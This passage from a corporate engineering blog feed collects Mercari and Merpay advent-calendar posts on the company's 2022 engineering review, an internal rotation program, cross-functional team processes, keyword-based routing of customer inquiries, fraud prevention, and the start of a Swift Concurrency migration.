Also a special thanks to Takashi Yoneuchi (@lmt_swallow) of Flatt Security Inc. who provided us with a great opportunity to discuss overall supply chain security together. Last but not least, thank you to the Mercari CI/CD team who gave me a lot of insight from the perspective of actual operations.

References

Look back of Mercari Engineering 2022

Sun, 25 Dec 2022 11:00:07 GMT

Hi this is @yasu_shiwaku from the Engineering Office.
This is the last article for Mercari Advent Calendar 2022.

As introduced in the Advent Calendar up to today, Mercari Engineering Organization was taking on many projects in 2022. Mercari Shops, the B2C marketplace platform operated by the subsidiary company Souzoh, has reached its 1st anniversary from the official launch, and also worked on multiple challenges as a same Engineering Organization under Marketplace business.

This article will be a summary of highlight projects and events for the Engineering Organization in Mercari’s Marketplace business in 2022, presented by the Board members with their personal look backs for this year and the aspiration for the coming year.

The comments are presented by the following Board members;

@kwakasa: CTO Marketplace / Managing Director of Mercari India
@CaDs: VP of Product Engineering, Mercari JP
@kimuras: VP of Platform Engineering, Mercari JP
@mtsuka: Director, Developer Productivity Engineering
@keigow: Director, Head of Engineering, Souzoh

Launch of the GU App (by @CaDs)

The Mercari Ground UP (GU) App for both iOS and Android platforms, which were launched in September 2022, was probably one of the biggest challenges that we have faced up to this date in Mercari Engineering. At some point, I’m convinced that almost all engineers were part of this effort in one way or another.

There are so many things that happened during this program that it is super hard to summarize. Instead, I would recommend reading this article in which we explain the motivation behind this project and the challenges that we faced.

In a sense, this project was a clear embodiment of our three core values.

Go Bold: We managed to release a full rewrite of both apps used by our millions of customers. We did while minimizing end-user impact, and managed to deliver a better user experience without any major issue.

All for One: This rewrite was done mainly by our mobile engineers, but everyone (PMs, web and backend engineers, etc) were actively doing dogfooding, providing early feedback, and hunting bugs that might lead to bad user experience. On top of that, many engineers across the whole group chimed in to support a successful release of the new aps.

Be a Pro: There were plenty of different technical challenges our engineers faced in the different stages of this project. It is amazing seeing how, no matter how complex the challenge was, our teams came up with solutions that not only solved the issues at hand but also went beyond and above to provide the best customer experience for our customers.

Check this article from our lead architects if you are interested in their experience.

Establishment of Mercari India (by @kwakasa)

Hello, everyone. I’m Ken (@kwakasa), CTO Marketplace. I’m currently also in charge of Mercari India as its Managing Director as well.
Here is a look back over the establishment of our India development center, which has made significant progress in 2022.

At the beginning of 2022, we kicked off one of our most recent strategic projects to reinforce Mercari Group’s product development and engineering capability.

We have been reaching out to and welcoming global tech talents from the world over the last few years to strengthen our capability to accomplish our mission of creating value in a global marketplace where anyone can buy & sell. However, as our product and service portfolio continues to expand, it became apparent that our engineering and development capabilities could not keep pace with ever-increasing business needs as well as the complexity and scale of implementations that empower our products.

That’s why we decided to spearhead our new journey to establish Mercari’s first-ever global center of excellence in Bengaluru, India. We believe that it’s one of the necessary steps we have to take to become a global tech company.

Thanks to everyone’s support, we were able to welcome our very first dozen members so far. We are very much looking forward to welcoming even more new members in 2023! We are very grateful to all Mercari members and partners for their relentless efforts to embody our values, Go Bold, All for One, and Be a Pro.

Please check out the blog post by Mohan, our head of engineering for GCoE (global center of excellence), for more details about our endeavor over the last several months.

Proceeding of the RFS (by @mtsuka)

Hello I am @mtsuka, the Director of Mercari’s Developer Productivity Engineering(DPE).
“Robust Foundation for Speed (RFS)” started last October as a mid-term project of group-wide refactoring by analyzing and improving the current system on a large scale.

As a person in charge, I would like to look back at the year 2022 of this project. The first half of this year was focusing on determining the scope of the project and solidifying the measuring method, then in the latter half, we worked within that area to produce the specific results.

RFS is basically about refactorings and migrations, and it is our nature as an engineer to make everything clean and well structured, but we have to be able to be accountable for the investment. In order to do so, we first decided to prioritize extracting the frequently modified components, and decoupling/migrating those DBs. Such measures were taken to make the promotional campaigns faster and easier since Mercari occasionally runs the point promotion campaigns. As the quality of the product is not only responsible for the engineers, we collaborated with the Technical Product Managers (TPMs)/ Product Managers (PMs) to assure the quality, and align the consensus with the product roadmap.

In the latter half of 2022, we continuously decoupled and migrated the DBs in the latter half of the year. Our main mindset was based on DRY(Don’t repeat yourself), and also abstracting the system by questioning ourselves like “What can we do so we don’t have to repeat the same hard work?” and “How can we make the same things happen easier?” We kept the tagline the same for the whole year, so by the end of the year, we were sharing the same values without saying. This made it easier for us to reach consensus when setting the target or the goals. It especially was conspicuous in the area of Transaction and CSTool, where our initial target scope is visible now, and the task force almost reaching our goal.

The detailed projects of what our team has been working on is published as a series of blogs below. Please take a look at them (sorry its only in Japanese)

To sum up on what was good this year as RFS;

We did not make the project an initiative for the engineers by engineers (collaborated with TPM/PMs
Keeping the tagline the same is important to obtain shared values

We would like to keep on improving our product and keep observing the measurements. There are of course numerous improvements that have to be made, so it will be important for each member to be accountable for the product’s quality with or without the structure of the task force.

Start of the FinOps project (by @kimuras)

Hi this is @kimuras, VP of Platform Engineering. We started the activity of FinOps this year, and the achievements we made were very fruitful. I’ll talk the overview and summary here, and let the detailed project explain to bungo’s article as follows (Japanese only);

Up to recently, Mercari was developing its service at a high speed, as well as migrating the architecture from Monolith to Microservices. However, looking back at the past high-speed development, we have reached the stage where we have to re-review our architecture and infrastructure costs. Migrating the architecture to Microservices does not simply solve the issues we had, but to keep on improving the service, we need to enhance the productivity of the engineers and review the cost that follows. Based on this background, we started reviewing the fundamental infrastructure costs as a FinOps project.

Making the FinOps team itself is not hard, but bringing it to the stage where the cost improvement is visible was not easy at all. This is due to the situation where not only the Mercari app uses Google Cloud Platform, but also the subsidiaries such as Mercari US, Merpay and Mercari Shops share the platform. This background made the cost structure complex, and created difficulty in the monitoring system to track the cost.

In order to produce a good result, we had to determine the delegates of the FinOps from each division, and periodically discuss the strategy of how to improve our cost reduction.
We still are amidst the optimal solution, but through the collaboration of FinOps members from each division, we have managed to visualize the cost structure for the cloud services, leading to more sophisticated projection of the infrastructure costs. Also, we can now notice the unintentional cost increase earlier than before, and quickly correspond with the responsible team.

Actually, the largest achievement of this project was not the reduction of the infra cost itself, but making the engineers aware of the infrastructure costs. By sharing the future projection of the costs, each engineer became naturally aware of how the cost fluctuates as well as understanding the current cost correctly. Our ultimate goal of FinOps is to create an environment where each team can optimize the cost on its own. I believe we have made the foundation of that ideal situation in this first year.

One Year since Mercari Shops release (by @keigow)

This is keigow, the Head of Engineering at Souzoh. A full year has passed since Mercari Shops was released publicly in October 2021. Here I will briefly look back on what had happened at Souzoh and Mercari Shops.

Mercari Shops is a product created with the concept of allowing shop owners to create their own virtual shops within the Mercari app.

Despite the fact that when we started the beta service in July after a very short period of development which started in January, by the end of the year we were able to develop features such as:

Shipping via specialized services (Mercari express / Refrigerated Mercari Shipping)
Bulk inventory management using CSV files.
APIs for external integration
Limited time offers

We still have many things we would like to provide to our customers, and we are planning to steadily keep making improvements to this product.

As discussed in this article, at Souzoh we value the principle of “Move Fast”. So far we have been able to deploy many releases on a day-to-day basis, which is the result of every engineering proactively making improvements on components they have ownership for. We intend to keep this going for the foreseeable future.

At the same time we have been seeing new growing pains. Mercari Shops was initially designed to be as independent as possible from the original Mercari app in order to accelerate development speed at the very beginning. But this has been causing some problems to make the customer (especially the buyers) experience better and smoother.

As these products were developed as independent applications, we need to come up with solutions on how to make them work together better: How do we simultaneously bring the items from each application? Or even before that, what is the best approach that we should take for the customers? In the coming year, we hope to tackle these big challenges both in terms of product design and engineering solutions, but either way, we look forward to working on these challenges.

Hack Fest 2022 (by @CaDs)

What best way to wrap up the year than doing some hacking? That’s exactly what we did last November.
We have talked previously about Mercari’s Hack Week. This time we introduced some modifications to the format and duration of the event, rebranding it into what we called Hack Fest.

Three days for our engineers to innovate and find ways to improve our service. This way, they can explore different areas of our product on which they might not have the chance to interact much during the daily work and make use of their creativity and talent to propose ways of improving Mercari.
You can read more details about our Hack Fest in this article.

We had 96 ideas submitted. After filtering and consolidating these 26 teams were assembled and these teams demoed their solutions.

I have to say that, on each iteration, our engineers keep pushing the bar higher and higher. Some of the ideas that were presented this round were just incredible.
I’m really looking forward to seeing these rolling out in production in upcoming months!

Hiring Information

Mercari is hiring!! If you are interested in joining us, please take a look at the application guidelines on Mercari Careers, or the project page for “Robust foundation for Speed” and “Mercari India” as follows;

Thank you for reading Mercari Engineering Blog’s Advent Calendar 2022 up to here! Have a Merry Christmas and a Happy New Year.

A brief story about the rotation program and my role in it

Sat, 24 Dec 2022 12:00:20 GMT

This post is for Day 24 of Merpay Advent Calendar 2022, brought to you by @ntk1000 from the Merpay Trust & Safety(TnS) Platform.

I’m working as an Engineering Manager at Merpay, in charge of the Trust & Safety(TnS) Platform team. I joined Merpay in 2019, Dec., and I’ve been in charge of multiple backend teams like, online payments, NFC payments, and the current team, TnS Platform. (I talked about our team’s cloud to cloud migration project at Merpay tech fest 2022 this summer, so if you’d like, you can read the article here (Japanese Only).)

This time I would like to introduce and explain the future of our Merpay engineering organization’s rotation program, not as TnS, but as one of Merpay’s EMs.

Two years ago, our organization held a discussion among EMs and put together a mechanism for internal transfers as "rotation program". Here is a blog post from the time after the program was released, and I remember as if it were a very long time ago that I was deeply involved in these discussions to create the "assignment rotation" mechanism.

objective

As mentioned in the previous blog post, it had been nearly three years since the development period before the release of merpay and the teams were stable, but to put it another way, the assignments were becoming more fixed. At the time, I was in charge of three teams as EM, and while each team was able to develop with a high degree of autonomy, there was not much cooperation among the teams, and there were times when one team had room to spare and the other team didn’t. Our backend teams were formed by more than 10 teams due to its Microservices architecture, and each team decided its own development style and how to divide the internal teams. (The characters of the EMs and TLs also vary, of course!) ) By having the employees gain experience in various backend teams through assignment rotations, they can learn various domain knowledge (e.g., from user-facing domain to platform-oriented domain) and deepen the interaction among engineers based on the common skills of Merpay’s product and backend. I also expected that this would lead to a deepening of interaction among engineers.

As an EM, I also wanted to actively support the career development of our members. When we announced our rotation program within the company, we set our support for career development as a purpose for the program, as well as setting forth our commitment to improving members’ skills by providing challenges and opportunities, understanding between teams, and creating a sustainable organization through the rotation.

operation

Over the past two years, I have continued to operate the rotation program to ensure that it runs well, including the maintenance of a team portal called Team Description (TD) (a page that introduces the team, its interests, development style, etc.), monthly announcements at Engineer All Hands, and confirming who wants to be rotated at EM meetings.

As a manager, apart from operating the program, I was also actively involved in developing a roadmap and goals for the team I was in charge of so that it would be a challenging environment for the members of my team, and in sharing the team’s roadmap and goals internally and externally. This would increase the likelihood that other team members would be interested in my team as well.

To my delight, in fact, more than half of the TnS Platform team is made up of members who rotated from other teams.Some members rotated each other with teams in neighboring domains. These members had the strong will to become an engineer who can broadly handle all aspects of anti-fraud measures by gaining experience in multiple TnS-related domains. This is one of the most pleasant experiences for me because the introduction of the rotation has expanded their domain knowledge and advanced their careers, as I had originally intended.

from now on

Recently an internal announcement was made regarding a rotation system that can be used across group companies. The rotation program in Merpay Engineering will be merged into that system. Though the program itself is not owned by EMs, this does not mean that EMs will no longer be involved in the rotation program, but rather that we managers will be required to consider from a broader perspective how we can support career development as a manager while offering a wider range of options to our members.

Managers are responsible for supporting the career development of their members in order to maximize the results and outcomes of the team and the organization, so what I’m trying to emphasizing is that regardless of the details of the program, we should continue to have a dialogue about our careers through 1-on-1s.

I would like to keep contributing to the career development of more members through management and help them expand their possibilities while continuing to commit to exciting product development with members.

Working in a cross functional team

Sat, 24 Dec 2022 10:00:59 GMT

Hello, I am Deepak Bhatt, and I work as a Backend Engineer in the New Lister Conversion Team. This post is for Day 24 of Mercari Advent Calendar 2022.

My team is a cross functional product team consisting of engineers, designers, product managers and data analysts. We work together to help users list more items on Mercari.

The team promotes to empower engineers and other members to take ownership of new ideas and conduct experiments to test these new ideas. Empowering members is an important concept for cross functional teams to make better products. In this article, we will talk about how we work as a cross functional team where we have created specific team processes to strive towards this goal.

How do we work in our team ?

Our team consists of around 15 members from different domains. We use scrum for project management with emphasis on less team meetings and more asynchronous communication through Google documents and Slack.

We work on new ideas in following 3 steps:

Ideation

In this step the team creates a list of ideas. Any member can take ownership of an idea and design an experiment to test it.

Refinement

After the Ideation step, the experiment owner refines the idea into functional specs and collaborates with other team members to deliver a new experiment. In this step, the experiment owner runs the experiment on users and ends the experiment after gathering sufficient data to calculate the experiment results.

Experimentation & Inference

Finally once the Refinement is done, the experiment owner has ended the experiment. The experiment owner then calculates the experiment result based on predefined metrics and determines next steps. The experiment owner also infers the experiment results and these insights would be used in future ideation.

Ideation is done with all the team members together while refinement and experimentation & Inference for each idea are done in parallel. We repeat all these steps after every 3 months.

We briefly described how we work as a team. Let us take a detailed look at each step.

Ideation: How do we come up with ideas ?

Ideas are based on hypotheses. Hypotheses are like foundational blocks for features, as you need a good foundation to build a tall building, similarly you need good hypotheses to build new features. The hypothesis also makes sure we focus on solving the biggest problems for our customers. We create good hypotheses through methods like user surveys, past experiments insight, data analysis etc.

After creating some hypotheses, we organize a team meeting to come up with new ideas. The meeting is contains 3 sections:

Kick-off , Inspiration and Ideation.

The first 2 sections provide valuable information to help team members come up with ideas in the Ideation section. The details about each section of the meeting are as following:

Kick-off: In this section, we explain the team mission and discuss short term v/s long term goals for our team. We also explain the hypotheses we would be working on this section.
Inspiration: In this section, we discuss past experiments and case studies to give concrete examples of how to design an experiment for a given idea.
Ideation: We use the information provided in the Kick-off and Inspiration sections to perform 3 exercises to come up with new ideas: Sketch, Decide and Present.

For the ideation section, we perform following 3 exercises to come up with new ideas:
Note: In the first 2 exercises(Sketch and Decide), we split the team in groups of 4-5 members and each group performs the exercises separately. For the last exercise(Present), we perform it with the whole team.

Sketch

The aim of this exercise is to generate and share a broad range of ideas as individuals. Each member works individually and comes up with 1 idea for the next exercise. We work individually to prevent biases and groupthink. All the steps of this exercise are as following:

Prepare: Take some time to prepare yourself for sketching ideas.
Crazy 8s: Sketch 8 ideas in 8 minutes.
Sketch your idea: Focus on 1 idea and elaborate it using three panel sketch

Decide

The aim of this exercise is to decide on the best ideas to take forward from each group. We assign one member from each group as the facilitator of the group. The facilitator decides which ideas would be presented to the whole team in the next exercise. All the steps for this exercise are as following:

Silent review and dot vote: Individually review each sketch from the group and vote of specific areas from the sketch for further discussion.
Group discussion: Discuss each sketch and clarify doubts.
Final Vote: Vote on favorite idea for the next exercise.
Final Decision: Facilitator picks 1~2 ideas from the group to present to the whole team in the next exercise.

Present

In this exercise, each group presents 1~2 ideas to the whole team. We follow these rules while presenting each idea:

The author of the idea presents it to the whole team.
The author provides all the necessary points discussed among the group for this idea in the previous exercise.
The author states the hypothesis for the idea and explains how the idea is related to the hypothesis.
We avoid any future discussion about the idea and try to understand each idea presented in the team.

After this exercise is done, we have a list of ideas that we can work on to deliver new experiments. Let’s discuss in the next section about refining these ideas into experiments.

Refinement: How do we refine ideas into experiments ?

Experiment owner refines an idea with the help of other members, especially product managers. Experiment owner can work on any of the following step from start till end of the experiment:

Writing Project document
- Doing research and analysis, stating the hypothesis, developing potential solutions
Discussing experiment specs with team members
Writing Experiment design document
- Defining metrics and release case scenarios.
Discussing with designers about ideal designs
Clarifying specs
Creating tickets
Analyzing results of the experiment
Determining next steps after experiment results

Taking ownership of an experiment is completely optional. The Product Manager supports experiment owners at each step and the experiment owner can flexibly discuss how much they want to contribute.
For example: Experiment owners can work on writing the project document and clarify the specs while product manager can work on other refinement steps

In the above section, we explained all the refinement steps for an experiment. Following are some of the team processes that helps refinement of ideas into experiments:

Weekly team Sync meetings: This process helps in discussion/clarification of specs.
Documentation and Templating: This process helps in writing project documents, experiment design documents, creating tickets and analyzing experiment results.
Optional Team Processes: These are optional processes that help in speeding up the refinement process.

Weekly team Sync meeting

Experiment owners can discuss and clarify experiment specifications during this meeting. It provides an easy way to get feedback from the whole team.
Some of the rules that we follow for this meeting:

All the discussion in this meeting are documented in a google document.
Members need to add their discussion points before the meeting starts.
In the meeting, all the members silently review all the discussion points and write questions or comments for each discussion point.
If the discussion is taking a long time, we stop the discussion and continue it on slack or schedule a meeting.

Documentation and Templating

Documentation is very important to onboard a new experiment owner. We try to document every refinement step and provide references for a deeper understanding. When you are creating documentation for idea refinement, please keep following things in mind:

Organize all the documents in one place.
Document common practices you follow in your team for refining ideas.
Provide references whenever possible for deeper understanding.

Templating is useful when we follow a similar structure for a refinement step. In our team, we have templates for following steps:

Project document template: The template provides all the sections we need to write. It also provides references to help experiment owners write all the sections.
Experiment design document template: We suggest common metrics and action plans that we follow in most of our experiments. The template also provides references to other documents that explains how to write your own metric and decide suitable action plans.
Experiment analysis template: The template provides analysis for standard metrics that we use in our team. An experiment owner can modify the template based on their experiment metrics and evaluate the experiment result.
JIRA Ticket template: We use JIRA for task management. We have created a document to note all the necessary tickets needed for an experiment and we have templates for creating individual tickets.

Optional Team Processes

Following are some of the other processes that we follow that may be useful for other teams in some cases:

Create dedicated slack channels for each experiment.

We have a large team and to reduce communication noise we create a slack channel for each experiment. The slack channel only contains those members that are working on the experiment.
Create a kickoff meeting for each idea when we start working on it.

Some ideas take a long time to clarify all the specs. Kickoff meetings help to clarify specs swiftly. These meetings are completely optional except for members you want to work on the idea.

Experimentation & Inference: How do we evaluate an experiment?

After an experiment ends, it is important to know what we learnt from the experiment. We keep following things in mind when we are concluding an experiment:

We decide the metric and future action plan before we start an experiment. This is to avoid any bias we could get based on experiment results. You should not modify metrics and action plans after looking at the experiment results.
We also note down what we learnt from the experiment. This is very helpful for conducting future experiments. Whatever are the experiment results please infer the result and share with all the team members.

Let’s take a look at the following hypothetical experiment to understand the above 2 points more clearly:
Experiment Details

Experiment: Send weekly notification to users at 4pm, Monday to inform them about the latest trending items on Mercari.

Hypothesis: Users will list more items if they are confident that their items would sell fast.

Goal Metrics: Number of listings per user
Action Plan:

If the goal metric shows more than 2% lift, release the feature to all users.

If the goal metric shows less than 2% lift, do not release the feature.

Experiment Result

Goal metric shows 0% lift from the experiment.

More than 90% of the users who got the notification, clicked on the notification to find more details.

Based on the experiment result, we stop sending the notification as we have decided earlier in our action plan. Although based on our analysis, we found out that users are interested in receiving trend related information as more than 90% of users clicked on the notification. Based on further analysis we found that:

Most of the users do not list items at 4pm, Monday.
Most of the users list items during weekend.

From this analysis we can infer following things:

The time for sending a new notification should not be arbitrary as it could affect the outcome of the experiment.
If the intent of a notification is to suggest a user to perform a certain action in the app, it would be better to send the notification when the user usually performs that action in the app.

These inferences could help us greatly in designing new experiments for sending similar notifications in future.

Sometimes teams do not find inferences from their experiments as finding inferences involve further analysis and research. The extra effort in finding inferences is very important as it greatly helps future experiments.

Summary

In this article we have explained in detail about how we work as a cross functional product team. Cross functional teams are made of people with different expertise to work together to deliver greater value to users. All the methods explained in this article helps empower all the members to achieve optimal results.

Empowering all the members to take ownership of new experiments is a very good strategy to make better products. Empowered Engineers FAQ article is very helpful in explaining many doubts in this area.

Customer Inquiry Routing Algorithm

Sat, 24 Dec 2022 10:00:10 GMT

Every month we receive hundreds of thousands of inquiries from our customers spanning hundreds of categories. To help our customers resolve their problems, we use a routing algorithm to route each inquiry to a suitable customer support agent among hundreds of agents. What does such a routing algorithm look like?

This post is for Day 24 of Mercari Advent Calendar 2022, brought to you by Prashant Anand from the Mercari Contact Center team.

You want to get your certificate of residence (住民票) [1]. What do you do?
You go to your ward office. You know that this certificate is issued by the Family register (戸籍住民サービス課) counter, so you go to that counter and get a ticket number. Then you wait until your number is up, give the application to the person behind the counter, and then the certificate is issued.

If you think about this process, once you arrive at the ward office, there are two main steps to get your certificate:

find the counter that you need to go to in the ward office
after creating a ticket, wait until your number is up

We handle inquiries sent by our customers at Mercari in a similar two-step process. First, we need to find out what the inquiry is about and then wait until a customer support (CS) agent that can handle the inquiry is available. In this article, we’ll learn about the design of a system that can achieve the former, i.e., a system that helps us find the category of the inquiry. We’ll NOT be looking at how we manage the queue of inquiries after we have identified their categories.

How to Find a Suitable Agent for an Inquiry

When Yuito [2], a 35-year-old school teacher living in Katori, could not log into his Mercari account and reset the password, he sent us an inquiry to recover his account. After Akari [3], a lawyer in Osaka, bought a t-shirt on Mercari, which was shipped via Raku-Raku Mercari Shipping, but has yet to receive the shipment even after five days, she contacted us to resolve the problem. Similarly, we receive inquiries about payments, counterfeit items, registration, and more.

To handle these inquiries, we could assign them randomly to any of the available agents but that would require all agents to know how to handle all kinds of inquiries before they can start working.

So, our CS team has created about 150 different categories of inquiry. Each of these categories is called a Skill. Categorizing inquiries helps agents develop specializations. One agent can become proficient in handling a particular type of inquiry.

In practice, each of our CS agents has a few skills. If an agent has four different skills, it means they have the expertise to handle four categories of inquiries. If we could identify the skill required to handle an inquiry, we could send it to one of the agents with that skill. In the rest of the article, we’ll see how to identify the skill required to handle an inquiry.

The Goal of the Routing Algorithm

If you want to get in touch with our customer support, we have a chat interface. This chat interface allows you to talk back and forth until your problem is solved. We call each message sent by a customer Contact and each response sent by our CS agents Reply, and the group of Contacts and Replies between a customer and our CS agents to solve a problem is called a Case.

So, whenever a customer sends us a message about a problem for the first time, we create a new case. Now the first message is quite important. In the first message, customers explain the problem they are facing. So, we use it to determine the skill required to respond to the inquiry.

Fig 1: Interaction between a customer and CS agents in a chat interface

Our routing algorithm aims to assign one of the skills to a case after receiving the first contact. In the next section, we’ll learn how to do exactly that.

Ticket Routing Algorithm

Ticket routing, i.e., assigning skill to a case, happens after we receive the first contact and before our CS agents send the first reply. Our routing algorithm works in two steps. In the first step, we assign a skill to each case. In the second step, depending on certain criteria, the skill of the case might or might not be updated. Let’s take a look at these steps one by one.

Step 1: Contact Type Routing

Fig 2: Screens to contact customer support through the Mercari app

As shown in the figure above, when customers want to send us an inquiry, they have to choose what the inquiry is about. This category chosen by the customer is what we call Contact Type. For each of these contact types, we have a corresponding skill stored in a table. Think of this table as a mapping from contact type to skill.

Fig 3: Contact type to skill mapping table

So when a new case is created, we look at the contact type of the case, find the corresponding skill from the lookup table, and assign that skill to the case. Since the lookup table contains a corresponding skill for all possible contact types, all the cases get assigned a skill in this step.

Step 2: Case Assort Rule Routing

The skill assigned to the case in step 1 based on the contact type is not always correct. Even for a single contact type, we need different skills depending on the situation. So far, we also have yet to consider the inquiry text. In step 2, Case Assort Rules help us reassign skills to the cases taking the inquiry text into account so that the assigned skills are more accurate.
A case assort rule has four attributes:

Contact type: One of the contact types
Include words: A list of words
Exclude words: A list of words
Skill: One of the skills

We say a case assort rule matches with an inquiry if all of the following three criteria are satisfied:

the rule and the inquiry have the same contact type
all of the include words are present in the inquiry text
none of the exclude words are present in the inquiry text

If all three criteria are satisfied, then we can assign the skill of the case assort rule to the inquiry. However, if any of the three criteria is not satisfied, the skill of the inquiry can’t be updated by the rule.

Let’s understand this through an example. Let’s consider the following case assort rule:

Contact type: Shipping
Include words: [らくらく]
Exclude words: [振込み, アカウント]
Skill: Logistics_Rakuraku_Mercari_Shipping

Let’s check if the following inquiry matches the case assort rule we just created:

Contact type: Shipping
Text: お取引相手の住所に不備があり、転居先不明と取引画面で出ています。正しい住所を入れるようにコメントしたのですが、返事が一向に帰ってきません。私はらくらくメルカリ便で送ったのですが、このような場合送った荷物はどうなるのでしょうか。
Skill: Logistics_Gen

As you can see, both the rule and the inquiry have the same contact type, Shipping. There is only one word in the include words list in the rule, らくらく, and it is present in the inquiry text. There are two words in the exclude words list in the rule, 振込み, and アカウント, and none of them are present in the inquiry text. Since all three criteria are satisfied, we say the rule matches the inquiry. So, we can update the inquiry skill from Logistics_Gen to Logistics_Rakuraku_Mercari_Shipping. This example is shown in the graphic below as well.

Fig 4: A sample inquiry that matches with a sample case assort rule

Let’s take a look at another example where the inquiry and the case assort rule created above do not match. Let’s consider the following inquiry:

Contact type: Shipping
Text: 発送方法をメルカリ便にしようと思って操作しようとしたのですが、誤って商品を発送する前に発送ボタンを押してしまいました。できれば発送前の状態に戻していただきたです。
Skill: Logistics_Gen

As you can see, both the rule and the inquiry have the same contact type, Shipping. However, the include words present in the rule, らくらく, is not present in the inquiry text. So, we say that the rule didn’t match the inquiry, and this rule can’t update the skill of the inquiry. We’ll leave the skill of the inquiry, Logistics_Gen, as it is. This example is shown in the graphic below as well.

Fig 5: A sample inquiry that doesn’t match with a sample case assort rule

We have a set of about 250 active case assort rules. When a new case is created and assigned a skill based on contact type in step 1, we come to the case assort rules in step 2. We start with the first case assort rule and check whether it matches the inquiry. We go down the list of rules until we find a match. As soon as we find a match, we assign the skill suggested by that rule to the case and stop going further down the list of rules. If we went through all the rules and none matched with the inquiry, the skill of the case is not updated.

So the overall process of inquiry routing has the following four steps:

Create a new case when a customer sends the first contact
Assign a skill to case based on the contact type selected by customer
Update the skill of the case if the inquiry matches any of the case assort rules
Assign the case to one of the CS agents who has the skill present in the case

Fig 6: 4 step customer inquiry routing algorithm

Conclusion

We looked at the design of a routing algorithm for customer inquiries that takes the inquiry text and inquiry category selected by the customer into the account for routing. The routing happens in two steps. In the first step, a skill is assigned to the case based on the inquiry category (contact type) selected by the customer. In the second step, the skill of the case is updated only if the case satisfies all 3 criteria for any of the case assort rules. After this step, the inquiry is routed to an agent with the skill present in the case.

Now looking at this system does leave us with many questions. How do we evaluate the performance of this system? Since both contact types and skills represent the categories of inquiries, why do we need both? Why can’t we just use the contact types for routing? How do we create case assort rules? Since we start matching an inquiry from the first rule and then go down the list of rules, is the order of the rules important? If yes, how can we find the optimal order? Can machine learning help us in improving the performance of this system? If yes, how can it be integrated into this system?

If you want answers to these questions, stay tuned to our engineering blog. What are your thoughts about these questions? Feel free to reach out, and I would love to discuss more.

The final article in the Mercari Advent Calendar 2022 series will be published tomorrow by @yasu_shiwaku. Look forward to it!

Footnotes

[1] This situation is specific to residents of Japan. A certificate of residence is a document that you can get from your local ward office. Read more details about it here.
[2] The story, all names, characters, and incidents portrayed in this example are fictitious. No identification with actual persons (living or deceased), places, buildings, and products is intended or should be inferred.
[3] The story, all names, characters, and incidents portrayed in this example are fictitious. No identification with actual persons (living or deceased), places, buildings, and products is intended or should be inferred.

Fraud, How do we handle it ?

Sat, 24 Dec 2022 01:00:36 GMT

This post is for Day 24 of Merpay Advent Calendar 2022, brought to you by codechaitu from Merpay TnS Team.

Handling millions of user transactions and providing the best service is a tough job because of the fraudulent activities.So today let’s see how in merpay we handle fraud situations and how we are working towards fraud prevention.

Let’s understand what fraud is, Wikipedia says “fraud is intentional deception to secure unfair or unlawful gain”. In simple words, using different ways to access private or unauthorized information in illegal ways. Knowing these types of activities happen, we are taking our best effort in minimizing the fraud.

Hello there, I am Chaitu, currently working for Trust and Safety of mercari/merpay users. I would like to discuss what measures we are taking to help customers to have a trusted environment about their transactions.

I was curious when I knew about this topic and wanted to understand more about it. I know you are also excited about it. Without further ado, let’s dig deeper together. For fraud prevention we use multiple different approaches, let’s understand them one-by-one.

With backend implementation approaches

While there are multiple methods implemented internally with a set of rules to check each transaction is legitimate or not. Out of all them, two features I liked the most are

Anshin Shiharai [あんしん支払い]

Let’s take a situation to understand how

A user wants to login, input ID and password to a phishing site.
Attacker fetches and puts them in the actual mercari app.
Authentication SMS is sent to mercari user.
The attacker fetches the code entered on the phishing site and inputs it to the mercari website.
Now the attacker gained unauthorized access.

Now with the あんしん支払い feature, backend will update the purchase limit of the user to 0yen [0 円].

But if an attacker wants to purchase some items with stolen credentials, the safe payment limit needs to be increased. For that another SMS authentication is needed, which is difficult.

If you want to learn more about this feature, here it is.

Using 3DS SDK

If a user is using a credit card for purchasing an item, for an extra layer of protection from fraud transaction, we use 3DS SDK with the app. The 3DS means 3 dimensional security which enhances each online transaction with user authorization using either PIN or password or OTP.

This will only be enabled only if the transaction looks suspicious. The flow of user transactions if found suspicious would be processed based on the risk type of the transaction.

With Machine Learning [ ML ] approach

Carefully checking each transaction manually is hard and time taking, so make it easier and quicker, few ML related techniques are employed, in them,

Handling chargeback fraud

Chargeback fraud is bank-initiated refund for a purchase when the card owner claims a transaction is unauthorized. Let’s understand from a example situation,

A credit card is stolen from a person.
Purchases are made from mercari using the stolen card.
Cardholder knew about the unauthorized transaction and contacted the bank.
Bank works with mercari to refund the money to the cardholder.

In the above process, the best place to stop fraud is in step-2 [ before buying things on mercari with a stolen credit card ].

The ML team uses a classification approach in figuring out the transaction is a normal or a chargeback transaction. Internally we use the per buyer transaction window algorithm to obtain important features to detect chargeback transactions which is implemented with Google AI platform and Airflow.

With Security approach

When backend and ML teams are trying to protect the user within the mercari/merpay environment, the security team is extending its support in protecting the user from risks outside the mercari/merpay environment.
One such risk to users is from Phishing sites, these sites look-alike actual mercari/merpay system, but can be identified with URL. Let’s see an example below, a phishing site created a UI which almost looks like a mercari login screen.

According to APWG’s recent report, phishing attacks climbed to a new record high in 2022 in the world. The same trend followed in Japan too when checked with the council of anti-phishing japan’s report.

Security team is trying to detect and take down phishing sites even before the user knows about it.

What as an end user should you take care of ?

While I am getting some notes about fraud prevention, I got some suggestions to general public,

To avoid phishing, don’t trust links in email. Use your app or bookmark an official website.
Flag an item or report if it is suspicious in the app.

Acknowledgements:

I would like to thank everyone who supported me for providing information about fraud prevention topics and answered my questions patiently.

Introducing Swift Concurrency to Merpay code

Fri, 23 Dec 2022 12:00:59 GMT

This post is for Day 23 of Merpay Advent Calendar 2022, brought to you by takeshi from Merpay iOS Team.

Introduction

Since Swift 5.5 was released in 2021, we are able to use Swift Concurrency.
Swift Concurrency prevents your code from data races and provides a simple way to implement async code. It is big news for iOS developers.
Merpay iOS team attempts to introduce Swift Concurrency into our code from 2022 September. It is a tough task we expect.
Merpay iOS code is large code. It is composed of a thousand files and more than 20 modules.

If you are interested in Merpay iOS module strategy, see this article,
Multi-module development to support Merpay scalability

At first we planned to modify a small part and then expand to another part, but we had some domino effects introducing Swift Concurrency. So we ended up needing to change the core code that all of the modules depend on.
Although our project is its own way, we have a lot of knowledge.
I am going to show why we try to introduce Swift Concurrency and how we process.
I hope it encourages you to introduce Swift Concurrency to your projects.

Motivation

Swift 6 requires concurrency code.
Almost all non-concurrency code would not build in Swift 6.
We don’t know in how many years Swift 6 will be released, but the sooner we prepare for Swift Concurrency the better Swift compile prevents our code from data races.
This project started in September 2022 and we still were in progress in December.
